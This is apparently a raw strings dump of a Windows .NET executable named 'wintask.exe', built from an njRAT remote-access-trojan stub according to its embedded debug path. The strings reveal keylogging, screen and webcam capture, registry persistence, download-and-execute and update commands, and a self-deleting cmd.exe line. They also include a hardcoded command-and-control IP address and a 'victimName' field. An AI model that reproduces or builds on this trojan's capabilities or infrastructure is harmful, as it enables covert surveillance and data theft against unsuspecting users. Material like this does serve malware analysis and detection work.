!This program cannot be run in DOS mode.
`.rsrc
@.reloc
7 s
v2.0.50727
#Strings
<>9__36_0
<Receive>b__36_0
kernel32
Microsoft.Win32
user32
ToInt32
StringToBase64
get_UTF8
<Module>
GetWindowTextLengthA
GetVolumeInformationA
capGetDriverDescriptionA
GetWindowTextA
GetHWID
System.IO
LastAS
LastAV
Aoraja
DownloadData
HandleData
ProjectData
mscorlib
Microsoft.VisualBasic
GetWindowThreadProcessId
GetProcessById
Thread
isConnected
Command
RegistryValueKind
CompareMethod
Keyboard
keyboard
CreateInstance
CompressionMode
SelectMode
VKCodeToUnicode
DeleteSubKeyTree
lastCapturedImage
FromImage
DrawImage
get_Message
get_Available
IDisposable
RuntimeTypeHandle
GetTypeFromHandle
WaitHandle
Rectangle
WinTitle
GetForegroundWindowTitle
get_MainWindowTitle
Module
AppWinStyle
get_Name
cbName
GetTempFileName
get_MachineName
lpRootPathName
get_OSFullName
get_FullName
victimName
get_UserName
get_ProcessName
registryName
lpszName
DateAndTime
DateTime
get_LastWriteTime
ChangeType
Dispose
get_Date
GetKeyboardState
GetAsyncKeyState
STAThreadAttribute
CompilerGeneratedAttribute
GuidAttribute
NeutralResourcesLanguageAttribute
DebuggableAttribute
ComVisibleAttribute
AssemblyTitleAttribute
AssemblyTrademarkAttribute
AssemblyFileVersionAttribute
AssemblyDescriptionAttribute
CompilationRelaxationsAttribute
AssemblyCopyrightAttribute
RuntimeCompatibilityAttribute
ReadByte
WriteByte
DeleteValue
GetObjectValue
GetValue
SetValue
Receive
Remove
wintask.exe
nVolumeNameSize
nFileSystemNameSize
set_SendBufferSize
set_ReceiveBufferSize
get_Jpeg
System.Threading
NewLateBinding
Encoding
System.Drawing.Imaging
FromBase64String
ToBase64String
CompareString
Base64ToString
BytesToString
GetString
System.Drawing
ToLong
CreateHash
ComputeHash
get_ExecutablePath
GetFolderPath
get_Width
get_Length
processInformationLength
lpMaximumComponentLength
GetWindowTextLength
MaxLength
EndsWith
get_ServicePack
RegistryKeyPermissionCheck
get_CapsLock
wintask
ConditionalCompareObjectEqual
LateCall
Uninstall
avicap32.dll
user32.dll
SearchForCam
NetworkStream
GZipStream
GetStream
MemoryStream
memoryStream
Program
OperatingSystem
HashAlgorithm
ToBoolean
CopyFromScreen
get_PrimaryScreen
currentPlugin
get_OSVersion
Conversion
System.IO.Compression
Application
GetVolumeInformation
processInformation
CopyPixelOperation
Interaction
System.Reflection
get_Position
set_Position
Exception
Environ
get_CtrlKeyDown
get_ShiftKeyDown
get_Info
currentAssemblyFileInfo
FileSystemInfo
ComputerInfo
GetInfo
DirectoryInfo
Bitmap
DecompressGzip
lpszVer
lpVolumeSerialNumber
MD5CryptoServiceProvider
StringBuilder
SpecialFolder
lpVolumeNameBuffer
lpFileSystemNameBuffer
ToInteger
ToUpper
CurrentUser
BitConverter
splitter
ServerComputer
wDriver
ToLower
Soccor
soccor
ClearProjectError
SetProjectError
Cursor
.cctor
Monitor
IntPtr
Graphics
System.Diagnostics
get_Bounds
Microsoft.VisualBasic.Devices
System.Runtime.InteropServices
Microsoft.VisualBasic.CompilerServices
System.Runtime.CompilerServices
System.Resources
DebuggingModes
GetModules
GetValueNames
GetTypes
WriteAllBytes
StringToBytes
GetBytes
lpFileSystemFlags
SocketFlags
Strings
System.Windows.Forms
Contains
Conversions
get_Chars
RuntimeHelpers
Cursors
Operators
processInformationClass
hProcess
NtSetInformationProcess
GetCurrentProcess
System.Net.Sockets
DoEvents
Concat
ImageFormat
PixelFormat
ConcatenateObject
OrObject
Connect
LateGet
System.Net
LateSet
set_MinWorkingSet
tcpSocket
get_Height
op_Explicit
get_Default
get_Client
WebClient
TcpClient
Environment
ParameterizedThreadStart
Convert
set_SendTimeout
set_ReceiveTimeout
GetKeyboardLayout
System.Text
GetWindowText
get_Now
GetForegroundWindow
ToUnicodeEx
stubMutex
ToArray
bytesArray
CreateSubKey
OpenSubKey
MapVirtualKey
lastKey
RegistryKey
System.Security.Cryptography
get_Assembly
get_Directory
DeleteValueFromRegistry
GetValueFromRegistry
SaveValueOnRegistry
op_Equality
WrapNonExceptionThrows
wintask
47.48.41.42
$0aa111a1-1239-929a-3a33-4444444b22cc
RSDS/Ka/
D:\RATS\njRAT-0.7d-Stub-CSharp-master\njRAT C# Stub\njRAT C# Stub-backup\obj\x86\Debug\wintask.pdb
_CorExeMain
mscoree.dll
<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">
<assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>
<trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">
<security>
<requestedPrivileges xmlns="urn:schemas-microsoft-com:asm.v3">
<requestedExecutionLevel level="asInvoker" uiAccess="false"/>
</requestedPrivileges>
</security>
</trustInfo>
</assembly>
yy/MM/dd
[ENTER]
Software\
yy-MM-dd
SystemDrive
Software
cmd.exe /C Y /N /D Y /T 1 & Del "
getvalue
Execute ERROR
Download ERROR
Executed As
Execute ERROR
Update ERROR
Updating To
Update ERROR
149.248.52.61
165d6ed123ac
Q2h1dGk=
VS_VERSION_INFO
0/*)0/*)?
VarFileInfo
Translation
StringFileInfo
000004b0
Comments
FileDescription
wintask
FileVersion
47.48.41.42
InternalName
wintask.exe
LegalCopyright
LegalTrademarks
OriginalFilename
wintask.exe
ProductVersion
47.48.41.42
Assembly Version
49.49.49.49